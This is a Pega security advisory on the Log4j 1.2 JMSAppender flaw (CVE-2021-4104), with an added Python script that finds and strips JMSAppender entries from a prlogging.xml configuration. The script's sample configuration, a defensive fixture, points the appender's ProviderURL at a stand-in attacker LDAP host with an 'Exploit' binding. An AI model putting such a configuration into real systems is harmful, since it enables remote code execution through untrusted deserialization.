This Security Advisory was originally published to Pega Documentation on December 20, 2021. It was moved to the Pega Support Center on August 31, 2022.
A vulnerability was identified in the JMSAppender of Apache Log4j logging software version 1.2 (CVE-2021-4104). It is exploitable only when an application is configured to use the JMSAppender and an attacker can write to the Log4j configuration: the TopicBindingName and TopicConnectionFactoryBindingName parameters can then be pointed at an attacker-controlled JNDI endpoint, and the appender deserializes the untrusted data it receives, which can lead to remote code execution. This is a separate issue from CVE-2021-44228 (Log4Shell) in Log4j 2.x; Log4j 1.2 is affected only through the JMSAppender. Log4j is widely used across organizations around the world.
This older version of Log4j is used in Pega Platform versions prior to Version 7.3. The standard file appenders and the prlogging.xml configuration file that ship with these older Pega Platform versions have been tested: they do not use the JMSAppender, so they do not meet the configuration criteria required to exploit CVE-2021-4104.
Pega Cloud clients should not be able to edit this file or add their own appenders, so Pega Cloud environments also do not meet the configuration criteria required to exploit CVE-2021-4104.
This issue does not require a hotfix from Pega.
For Pega clients who are using on-premises or self-managed cloud installations: if a client has customized their prlogging.xml file and has added their own appender to that configuration, where the custom appender uses the JMSAppender class (org.apache.log4j.net.JMSAppender) from the Log4j 1.2 library that ships with Pega, they may be vulnerable. In this situation, clients are strongly urged to disable and remove that appender and use the standard console or file appenders that are shipped out-of-the-box.
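The check and cleanup described above, as an added example that is not Pega's own code or tooling: the script parses a Log4j 1.2 XML configuration in the prlogging.xml style, reports every appender whose class is org.apache.log4j.net.JMSAppender together with the JNDI-related parameters it sets and whether any logger references it, and then produces a copy of the configuration with those appenders and their appender-ref entries removed, leaving the stock file appender in place. The sample configuration embedded in the script is constructed for illustration; the appender names, parameter values and hostname in it are assumptions, and only the Log4j 1.2 class and parameter names are real.

```python
"""Find and remove Log4j 1.2 JMSAppender definitions (CVE-2021-4104 check).

Added example, not Pega's code. The sample configuration below is constructed
for illustration; only the Log4j 1.2 class and parameter names are real.
"""
import xml.etree.ElementTree as ET

JMS_APPENDER_CLASS = "org.apache.log4j.net.JMSAppender"

# JMSAppender parameters that name JNDI objects or the JNDI provider. Whoever
# controls these controls what the appender looks up and deserializes.
JNDI_PARAMS = {
    "InitialContextFactoryName",
    "ProviderURL",
    "TopicBindingName",
    "TopicConnectionFactoryBindingName",
}

# Keep the log4j namespace prefix when re-serializing the cleaned configuration.
ET.register_namespace("log4j", "http://jakarta.apache.org/log4j/")

# Constructed sample: a customized prlogging.xml where a custom JMS appender
# (hypothetical name "CUSTOM-JMS") was added beside the stock file appender.
SAMPLE_PRLOGGING_XML = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE log4j:configuration SYSTEM "log4j.dtd">
<log4j:configuration xmlns:log4j="http://jakarta.apache.org/log4j/">
  <appender name="PEGA" class="org.apache.log4j.RollingFileAppender">
    <param name="File" value="PegaRULES.log"/>
    <layout class="org.apache.log4j.PatternLayout">
      <param name="ConversionPattern" value="%d [%t] %-5p %c - %m%n"/>
    </layout>
  </appender>
  <appender name="CUSTOM-JMS" class="org.apache.log4j.net.JMSAppender">
    <param name="InitialContextFactoryName" value="com.sun.jndi.ldap.LdapCtxFactory"/>
    <param name="ProviderURL" value="ldap://attacker.example:1389/"/>
    <param name="TopicBindingName" value="Exploit"/>
    <param name="TopicConnectionFactoryBindingName" value="ConnectionFactory"/>
  </appender>
  <root>
    <priority value="info"/>
    <appender-ref ref="PEGA"/>
    <appender-ref ref="CUSTOM-JMS"/>
  </root>
</log4j:configuration>
"""


def find_jms_appenders(xml_text):
    """Return one record per JMSAppender found in a Log4j 1.2 XML config."""
    root = ET.fromstring(xml_text)
    referenced = {ref.get("ref") for ref in root.iter("appender-ref")}
    findings = []
    for appender in root.iter("appender"):
        if appender.get("class") != JMS_APPENDER_CLASS:
            continue
        params = {p.get("name"): p.get("value") for p in appender.findall("param")}
        findings.append({
            "name": appender.get("name"),
            # An unreferenced appender is never instantiated by the root/loggers,
            # but Pega's guidance is to remove it either way.
            "referenced": appender.get("name") in referenced,
            "jndi_params": {k: v for k, v in params.items() if k in JNDI_PARAMS},
        })
    return findings


def remove_jms_appenders(xml_text):
    """Return the config with every JMSAppender and its appender-refs removed.

    The XML declaration and DOCTYPE are not preserved by ElementTree; re-add
    them if the deployment's config loader requires them.
    """
    root = ET.fromstring(xml_text)
    removed = set()
    for parent in root.iter():
        for child in list(parent):
            if child.tag == "appender" and child.get("class") == JMS_APPENDER_CLASS:
                removed.add(child.get("name"))
                parent.remove(child)
    for parent in root.iter():
        for child in list(parent):
            if child.tag == "appender-ref" and child.get("ref") in removed:
                parent.remove(child)
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    for finding in find_jms_appenders(SAMPLE_PRLOGGING_XML):
        print("JMSAppender found:", finding)
    print(remove_jms_appenders(SAMPLE_PRLOGGING_XML))
```

Run it against a real prlogging.xml by reading the file into the two functions instead of the constructed sample; an empty result from find_jms_appenders means the configuration does not match the CVE-2021-4104 criteria, and a non-empty result means the named appender should be removed and replaced with the shipped console or file appenders.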
Pega also strongly recommends that clients running on these older versions of Pega Platform upgrade to our current Pega Infinity (8.x) series, which has the latest security and functionality.